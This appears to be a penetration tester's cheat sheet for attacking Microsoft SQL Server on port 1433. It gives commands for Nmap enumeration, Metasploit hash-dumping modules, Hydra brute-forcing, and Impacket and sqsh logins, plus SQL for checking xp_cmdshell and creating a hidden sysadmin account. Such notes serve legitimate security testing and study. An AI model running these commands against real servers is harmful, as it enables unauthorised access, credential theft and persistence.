Ms-SQL 1433

1. Nmap for MSSQL Enumeration:

• Search for related Nmap scripts:

  nmap --script-help "ms and sql"

• Run Nmap with selected MSSQL scripts:

  nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

• Run specific MSSQL scripts:

  nmap --script ms-sql-info -p 1433 10.0.0.0
  nmap --script ms-sql-config -p 1433 10.0.0.0
  nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
  nmap --script ms-sql-* -p 1433 10.0.0.0

2. Metasploit Modules for MSSQL:

• Common MSSQL Metasploit modules:

  msfconsole
  msf> use admin/mssql/mssql_enum
  msf> use admin/mssql/mssql_enum_domain_accounts
  msf> use admin/mssql/mssql_enum_sql_logins
  msf> use auxiliary/admin/mssql/mssql_findandsampledata
  msf> use auxiliary/admin/mssql/mssql_idf
  msf> use auxiliary/scanner/mssql/mssql_hashdump
  msf> use auxiliary/scanner/mssql/mssql_schemadump

• These modules allow you to:

  • Enumerate MSSQL logins and domain accounts.

  • Dump hashes and retrieve database schema.

3. Bruteforcing MSSQL with Hydra:

• Bruteforce with a username list:

  hydra -L usernames.txt -p password 10.0.0.0 mssql

• Bruteforce with a password list:

  hydra -l username -P passwords.txt 10.0.0.0 mssql

4. Connecting to MSSQL with Impacket:

• SQL Authentication:

  impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>

• Windows Authentication:

  impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

5. Connecting to MSSQL with sqsh:

• Basic connection:

  sqsh -S <target-ip> -U username -P password

• Connect to a specific database:

  sqsh -S <target-ip> -U username -P password -D database

6. SQL Commands for Enumeration:

• Get all users:

  SELECT * FROM sys.database_principals;

• Switch to a specific database:

  USE <database>;

• List available databases:

  SELECT * FROM master.dbo.sysdatabases;

• List tables within a database:

  SELECT * FROM information_schema.tables;

• Get content from a table:

  SELECT * FROM <database_name>.dbo.<table_name>;

• Get the MSSQL version:

  SELECT @@version;

• Check permission to execute OS commands:

  USE master;
  EXEC sp_helprotect 'xp_cmdshell';

• Get linked servers:

  EXEC sp_linkedservers;
  SELECT * FROM sys.servers;

• Create a new user with sysadmin privileges:

  CREATE LOGIN tester WITH PASSWORD = 'password';
  EXEC sp_addsrvrolemember 'tester', 'sysadmin';

• Get the current username:

  SELECT user_name();